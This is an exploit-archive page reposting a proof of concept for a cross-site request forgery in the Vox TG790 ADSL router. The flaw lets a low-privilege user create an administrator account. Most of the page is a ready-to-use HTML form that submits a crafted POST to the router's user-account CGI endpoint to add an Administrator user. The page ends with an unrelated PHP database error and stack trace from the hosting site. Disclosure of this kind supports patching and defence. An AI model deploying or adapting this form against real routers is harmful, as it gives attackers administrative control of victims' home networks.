Vox tg790 adsl router crosssite request forgery (add admin) Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2018-08-24 | Type : webapps | Platform : hardware


[+] Code ...

# Title: Vox TG790 ADSL Router - Cross-Site Request Forgery (Add Admin)
# Author: Cakes
# Exploit Date: 2018-08-01
# Vendor: Vox Telecom
# Link: https://www.vox.co.za/
# Firmware Version: 6.2.W.1
# CVE: N/A

# Description
# Due to improper session management low privilege users are able to create
# administrator accounts through a crafted POST request.

# PoC

<html>
<form action="https://TARGET/cgi/b/users/cfg/usraccedit/?be=0&l0=2&l1=9&tid=ADD_USER" method="POST">
<input type="hidden" name="0" id="0" value="10">
<input type="hidden" name="1" id="1" value="usrAccApply">
<input type="hidden" name="34" id="34" value="LulzCakes">
<input type="hidden" name="36" id="36" value="1">
<input type="text" name="33" id="33" placeholder="Account Name">
<br />
<input type="text" name="31" id="31" value="Administrator">
<br />
<input type="submit" value="W00ts">
</form>
</html>


Fatal error: Uncaught mysqli_sql_exception: Too many connections in /var/www/html/_dbconfig.inc.php:45 Stack trace: #0 /var/www/html/_dbconfig.inc.php(45): mysqli->__construct() #1 /var/www/html/_footer.inc.php(2): require('...') #2 /var/www/html/security/exploits-vulnerability/vuln.php(218): require('...') #3 {main} thrown in /var/www/html/_dbconfig.inc.php on line 45